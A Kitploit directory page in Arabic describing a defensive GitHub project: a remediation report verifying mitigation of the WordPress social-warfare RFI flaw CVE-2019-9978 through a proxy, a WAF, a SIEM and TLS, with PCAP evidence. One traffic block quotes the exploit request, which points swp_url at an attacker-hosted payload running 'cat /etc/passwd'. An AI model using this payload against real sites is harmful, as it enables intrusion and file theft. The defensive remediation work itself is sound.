Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Vuln_Remediation_MegaQuagga — تقرير المعالجة لنشر MegaQuagga الذي يتحقق من تخفيف CVE-2019-9978 من خلال طبقات دفاعية تقدمية. يوثق إدراج الوكيل العكسي (reverse proxy)، ونشر جدار حماية تطبيقات الويب ModSecurity، وتكامل Graylog SIEM، وفرض SSL/TLS باستخدام تحليل متعدد المراحل لـ Wireshark PCAP عبر واجهات pfSense WAN و LAN. | Kitploit
أدوات/GitHubGitHub/b4ntgrim/vuln_remediation_megaquagga
أدوات دفاعيةتحليل الثغرات الأمنيةأمن الويبأمن الشبكاتالتعلم والتعليمالاستجابة للحوادثتحليل السجلات
GitHubb4ntgrim/vuln_remediation_megaquagga

Vuln_Remediation_MegaQuagga

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
3منذ 4 أشهرلم تتم المراجعة بعد

حول

تقرير المعالجة لنشر MegaQuagga الذي يتحقق من تخفيف CVE-2019-9978 من خلال طبقات دفاعية تقدمية. يوثق إدراج الوكيل العكسي (reverse proxy)، ونشر جدار حماية تطبيقات الويب ModSecurity، وتكامل Graylog SIEM، وفرض SSL/TLS باستخدام تحليل متعدد المراحل لـ Wireshark PCAP عبر واجهات pfSense WAN و LAN.

مشاركة

Vuln_Remediation_MegaQuagga

تقرير المعالجة لنشر MegaQuagga للتحقق من تخفيف CVE-2019-9978 من خلال طبقات دفاعية تدريجية. يوثق إدراج الوكيل العكسي، ونشر ModSecurity WAF، وتكامل Graylog SIEM، وفرض SSL/TLS باستخدام تحليل PCAP متعدد المراحل عبر واجهات WAN و LAN لجدار pfSense.

معالجة الثغرات — تقرير معالجة MegaQuagga

المحلل: Samuel Weiss المنظمة: 0x2A Security الإصدار: 1.1 (27 أبريل 2026) العميل: MegaQuagga Publishing التصنيف: سري


نظرة عامة

يوثق هذا المشروع المعالجة النشطة للثغرات التي تم تحديدها أثناء اختبار الاختراق لـ MegaQuagga، مع التركيز بشكل خاص على CVE-2019-9978 (تضمين الملفات عن بعد عبر إضافة social-warfare لووردبريس). تم التحقق من المعالجة من خلال تحليل التقاط الحزم متعدد المراحل باستخدام Wireshark عبر واجهتي WAN و LAN لجدار pfSense، مع تطبيق ضوابط دفاعية تدريجية وإعادة اختبارها في كل مرحلة.


الملفات

ملفالوصف
_VULN_REMEDIATION__MegaQuagga_Remediation_Report__Samuel_Weiss_.docxتقرير معالجة كامل يتضمن ملخص تنفيذي والإجراءات المتخذة والأدلة المستندة إلى PCAP على المعالجة والتوصيات المستقبلية
_VULN_REMEDIATION__PCAP_worksheet__Samuel_Weiss_.xlsxورقة عمل تحليل PCAP توثق ملفات التقاط الحزم وتدفق حركة المرور في كل مرحلة معالجة وعناوين IP المصدر/الوجهة والمنافذ وتعليقات تدفق TCP

النطاق

  • الثغرة المعالجة: CVE-2019-9978 — تضمين الملفات عن بعد (RFI) عبر إضافة social-warfare لووردبريس
  • البيئة: خادم ووردبريس لنشر MegaQuagga مع جدار حماية pfSense
  • النهج: طبقات دفاعية تدريجية مع إعادة تنفيذ الاستغلال بعد كل ضابطة للتحقق من الفعالية

الإجراءات المتخذة للمعالجة

1. إدراج الوكيل العكسي

تم نشر وكيل عكسي أمام خادم ووردبريس، مما غير بنية الشبكة بحيث لم يعد من الممكن توجيه حركة المرور المباشرة إلى خادم التطبيق الخلفي من الشبكة الخارجية. أكدت أدلة PCAP توجيه حركة المرور عبر طبقة الوكيل.

2. جدار حماية تطبيقات الويب (WAF) — ModSecurity

تم تمكين ModSecurity كطبقة WAF على الوكيل العكسي. عند إعادة تنفيذ استغلال RFI، تم حظر الحمولة الخبيثة swp_url وأعاد الخادم HTTP 403 Forbidden، مما أكد أن قاعدة WAF كانت تعمل على توقيع الاستغلال. تم تأكيد نشاط التنبيه في Graylog SIEM.

3. تكامل SIEM — Graylog

تم تكوين Graylog لتوفير تجميع مركزي للسجلات ومراقبة التنبيهات. تم نشر قواعد تنبيه ModSecurity للكشف عن توقيعات استغلال RFI، مما يوفر رؤية فورية لمحاولات الهجوم.

4. فرض SSL/TLS وتحصين الجدار الناري

  • تم نشر شهادة SSL صالحة على الوكيل العكسي مع تكوين تحميل SSL.
  • تم تحديث قواعد جدار الحماية WAN لـ pfSense للسماح فقط بـ HTTPS على المنفذ 443.
  • تم تحديث قواعد NAT لتعكس سياسة الدخول الجديدة.
  • عند إعادة الاختبار، تم حظر حمولة RFI ولم تتمكن من اختراق البيئة.

سجل التقاط PCAP


تدفق حركة مرور الاستغلال — تحليل الحزم الرئيسي

قبل المعالجة (Red-Team-1 / pfSense-LAN-1)

root@kitploit:~
[Attacker] → GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://[attacker]:8000/payload.txt
[WordPress] → GET /payload.txt (fetches attacker-hosted PHP payload)
[Attacker]  → Returns: <pre>system('cat /etc/passwd')</pre>
[WordPress] → Returns /etc/passwd contents to attacker ✅ EXPLOIT SUCCESSFUL

بعد WAF (pfSense-LAN-3)

root@kitploit:~
[Attacker] → GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=...
[WAF]       → HTTP 403 Forbidden ✅ EXPLOIT BLOCKED

بعد SSL Enforcement (pfSense-LAN-4)

root@kitploit:~
[Attacker] → HTTPS only; HTTP port 80 blocked at pfSense WAN
[pfSense]  → Exploit payload cannot reach web server ✅ EXPLOIT BLOCKED

التوصيات المستقبلية

  1. حافظ على تصحيح الإضافات وتدقيقها — قم بتحديث social-warfare إلى الإصدار v3.5.3+؛ قم بإزالة الإضافات غير النشطة لتقليل سطح الهجوم
  2. حافظ على قواعد الجدار الناري — راجع قواعد pfSense دورياً؛ حافظ على حظر المنفذ 80 أو إعادة توجيهه إلى HTTPS
  3. راقب تنبيهات SIEM باستمرار — راجع قواعد تنبيه Graylog وقم بتحديثها بانتظام؛ قم بتعيين التنبيهات لمالك مسؤول للاستجابة في الوقت المناسب
  4. أجرِ فحصاً دورياً للثغرات — قم بجدولة مسح روتيني ضد خادم ووردبريس والبنية التحتية المحيطة؛ قم بالمعالجة وفقاً لجداول زمنية قائمة على الخطورة
  5. فرض الامتياز الأقل — قم بتقييد عمليات خادم الويب وحسابات مستخدمي ووردبريس إلى الحد الأدنى من الأذونات المطلوبة

وصف GitHub

تقرير معالجة لنشر MegaQuagga للتحقق من تخفيف CVE-2019-9978 من خلال طبقات دفاعية تدريجية. يوثق إدراج الوكيل العكسي، ونشر ModSecurity WAF، وتكامل Graylog SIEM، وفرض SSL/TLS باستخدام تحليل PCAP متعدد المراحل عبر واجهات WAN و LAN لجدار pfSense.

تنزيل الأداة
الملفالتاريخالواجهةالفلترالحزمالمرحلة
Red-Team-1.pcapng2025-01-03eth0 (Red-Team)none4,013خط الأساس قبل المعالجة
Red-Team-2.pcapng2026-04-22eth0 (Red-Team)none26,841قبل المعالجة (تم تأكيد الاستغلال)
pfSense-WAN-1.pcap2026-04-22em0 (WAN)192.168.100.x46تم التقاط حركة مرور الاستغلال من جانب WAN
pfSense-LAN-1.pcap2026-04-23em1 (LAN)192.168.100.x39حركة مرور الاستغلال من جانب LAN (قبل الوكيل)
pfSense-LAN-2.pcap2026-04-23em1 (LAN)port 80/800045بعد إدراج الوكيل العكسي
pfSense-LAN-3.pcap2026-04-24em1 (LAN)port 80/8000/4431,000بعد تمكين WAF (تم تأكيد 403 ممنوع)
pfSense-LAN-4.pcap2026-04-25em1 (LAN)port 81/8000/443534بعد تحميل SSL (تم حظر الاستغلال)